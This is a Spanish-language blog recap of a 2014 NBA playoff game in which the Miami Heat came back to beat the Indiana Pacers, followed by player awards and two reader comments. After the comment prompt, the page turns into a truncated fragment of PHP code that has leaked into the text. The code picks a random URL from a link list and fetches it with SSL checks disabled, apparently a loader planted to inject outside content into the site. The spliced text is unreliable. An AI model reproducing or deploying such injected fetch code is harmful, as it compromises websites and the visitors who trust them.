La Crónica: Dr. Jekyll y Mr. Hyde

25 de May de 2014 por txusma

Los Miami Heat se acabaron imponiendo en un partido que a mediados de la 2ª parte perdían de 15 puntos. Hasta ese momento, su actuación rozaba el esperpento. Empezaron el partido con un parcial de 17-4 en contra tras fallar 8 de sus 10 primeros lanzamientos y no poder frenar a David West y Roy Hibbert. En el primer cuarto sólo habían sido capaces de anotar 14 puntos. Se recuperaron un tanto pero al inicio del 2º Luis Scola abusó de los suplentes de los Heat y de nuevo volvieron los 15 puntos de diferencia. Los Pacers se encontraban muy cómodos y no parecía que las tornas fueran a cambiar rápidamente.

Sin embargo, de repente algo hizo click. Como si todos los jugadores se hubieran tomado la poción que alternaba las personalidades de Dr- Jekyll y Mr. Hyde, los de Indiana se olvidaron de jugar al baloncesto mientras que los de Miami empezaron a imponer su estilo de juego. En los últimos 6 minutos de la 1ª parte, los Pacers cometieron más pérdidas (6) que puntos anotaron (5) y la dinámica ya no cambió tras la reanudación. Los Heat se consiguieron poner por delante y el partido se entregó a unos sucesivos cambios de liderato hasta que un par de triples de Lebron James y Dwyane Wade otorgaban 7 puntos de ventaja a los suyos. 

Y en el último cuarto apareció Ray Allen, el gran Ray Allen. Su 4 de 4 en triples acabó de certificar una victoria muy trabajada que no disipa las dudas que nos deja el juego de los Heat pero que demuestra que sus jugadores son capaces de reponerse en situaciones complicadas. A veces con eso basta pero no en unas finales.

PREMIOS

MVP: Lebron James (26p – 5r  -7a – 4rb) fue el mejor jugador en términos estadísticos pero los 4 triples del último cuarto del viejo rockero Ray Allen (16p) amarraron definitivamente la victoria de los suyos.

Sorpresa: Rashard Lewis no anotó ni un punto pero ante los problemas de faltas de Bosh saltó a pista y se marcó una enorme defensa sobre David West que acabó resultando clave para el devenir del partido.

Decepción: Volveríamos a hablar de Chris Bosh (9p – 4r) que no se está mostrando especialmente acertado en esta serie pero es más destacable la desconexión de los Pacers cuando tenían el partido totalmente controlado.

Esfuerzo en vano: Lance Stephenson (10p – 11r – 5a) fue el más destacado de los suyos pero tampoco para tirar cohetes.

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Dantley dice:
    #1

    Ray Allen es eterno.

      Citar

  2. Esteban dice:
    #2

    hay Vogel, el partido estaba peleado, 4 o 5 puntos de diferencia, spolstra metio a chalmers, allen, wade, lebron y bosh en cacnha,
    Vogel por su parte siguio con hibbert y west, quien debia defender a allen (lebron lo hubiese sacado a pasear), y alli se vino el vendabal de triples que definio por nanticipado un partido parejo

    error de Vogel, y si los Pacers ganan el proximo final sentenciado

    el ataque de indiana es pesimo, si George no anota como una estrella, es un equipo pesimo en ataque

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>